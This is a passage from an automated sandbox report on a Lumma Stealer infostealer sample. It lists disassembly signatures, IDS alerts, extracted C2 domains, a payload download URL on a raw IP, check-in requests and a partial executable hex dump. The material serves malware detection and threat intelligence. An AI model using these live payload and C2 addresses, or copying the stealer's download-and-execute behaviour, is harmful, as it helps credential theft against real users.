                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]1_2_00A2D557
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_00A1C6C3
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]1_2_00A1A637
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov edx, eax1_2_00A17797
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then jmp ecx1_2_00A2C79B
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]1_2_00A077E9
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]1_2_00A087DF
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then jmp eax1_2_00A16739
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]1_2_00A1B763
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_00A1B763
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_00A1C8B1
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_00A23897
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_00A04806
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h1_2_00A10817
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]1_2_00A1B75E
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_00A1B75E
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_00A1C98D
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_00A1C99C
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]1_2_00A189C0
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch1_2_00A099D7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh1_2_00A099D7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh1_2_00A099D7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h1_2_00A099D7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h1_2_00A099D7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h1_2_00A099D7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh1_2_00A099D7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h1_2_00A099D7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]1_2_00A2A9DE
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov eax, edx1_2_00A0C921
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00A06907
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_00A1C94B
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]1_2_009F9967
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]1_2_009F9967
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]1_2_009F9967
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]1_2_009FEAA2
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]1_2_009FDA09
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]1_2_009FDA09
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_009FABA7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov edx, ecx1_2_009FABA7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h1_2_00A15BF7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx ecx, di1_2_00A15BF7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]1_2_009FCB7E
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov esi, eax1_2_00A13C9B
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh1_2_00A26C3B
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi]1_2_00A2BC08
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_00A19C17
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]1_2_00A0EC17
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h1_2_00A2CD87
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_00A2AD19
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ebp, dword ptr [eax]1_2_00A26E67
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]1_2_009FDF8C
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h1_2_00A2CFC7
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov word ptr [ebx], dx1_2_00A08F35
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov word ptr [ebx], cx1_2_00A08F35
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov ecx, eax1_2_00A11F77
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeCode function: 4x nop then mov word ptr [eax], dx1_2_00A05F79

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.4:52948 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.4:63184 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.4:56148 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.4:64277 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.4:63953 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.4:52644 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.4:49733 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.4:65393 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.4:51481 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.4:49732 -> 104.21.22.222:443
                Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.4:60088 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 104.21.22.222:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.22.222:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49735 -> 23.55.153.106:443
                Source: Malware configuration extractorURLs: diffuculttan.xyz
                Source: Malware configuration extractorURLs: debonairnukk.xyz
                Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                Source: Malware configuration extractorURLs: deafeninggeh.biz
                Source: Malware configuration extractorURLs: awake-weaves.cyou
                Source: Malware configuration extractorURLs: sordid-snaked.cyou
                Source: Malware configuration extractorURLs: effecterectz.xyz
                Source: Malware configuration extractorURLs: immureprech.biz
                Source: DNS query: effecterectz.xyz
                Source: DNS query: diffuculttan.xyz
                Source: DNS query: debonairnukk.xyz
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 13:12:47 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 14 Dec 2024 13:00:02 GMTETag: "58600-6293a86885370"Accept-Ranges: bytesContent-Length: 361984Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 17 cd 9e a9 53 ac f0 fa 53 ac f0 fa 53 ac f0 fa ee e3 66 fa 52 ac f0 fa 4d fe 74 fa 4d ac f0 fa 4d fe 65 fa 47 ac f0 fa 4d fe 73 fa 3d ac f0 fa 74 6a 8b fa 5a ac f0 fa 53 ac f1 fa 20 ac f0 fa 4d fe 7a fa 52 ac f0 fa 4d fe 64 fa 52 ac f0 fa 4d fe 61 fa 52 ac f0 fa 52 69 63 68 53 ac f0 fa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e7 de 32 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f8 03 00 00 0e 3f 00 00 00 00 00 5c 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 43 00 00 04 00 00 9e c3 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 29 04 00 50 00 00 00 00 10 42 00 30 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c f6 03 00 00 10 00 00 00 f8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4c 22 00 00 00 10 04 00 00 24 00 00 00 fc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c c4 3d 00 00 40 04 00 00 70 00 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 f4 00 00 00 10 42 00 00 f6 00 00 00 90 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: Joe Sandbox ViewIP Address: 104.21.22.222 104.21.22.222
                Source: Joe Sandbox ViewIP Address: 172.67.179.207 172.67.179.207
                Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 176.113.115.19:80
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.22.222:443
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 172.67.179.207:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029F4
                Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
                Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: t.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: post-to-me.com
                Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
                Source: global trafficDNS traffic detected: DNS query: immureprech.biz
                Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
                Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
                Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
                Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
                Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
                Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: TN78WX7nJU.exe, 00000000.00000003.1840353767.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, TN78WX7nJU.exe, 00000000.00000003.4091039362.0000000000A63000.00000004.00000020.00020000.00000000.sdmp, TN78WX7nJU.exe, 00000000.00000003.4091067138.0000000000A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
                Source: TN78WX7nJU.exe, 00000000.00000003.1840353767.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe#
                Source: TN78WX7nJU.exe, 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
                Source: TN78WX7nJU.exe, 00000000.00000003.1840353767.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/_
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222077563.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985978022.0000000000B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222077563.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985978022.0000000000B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222077563.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985978022.0000000000B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222059436.0000000000BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.D
                Source: C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985908975.0000000000B42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awake-weaves.cyou/api
                Source: C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awake-weaves.cyou/apiH
                Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
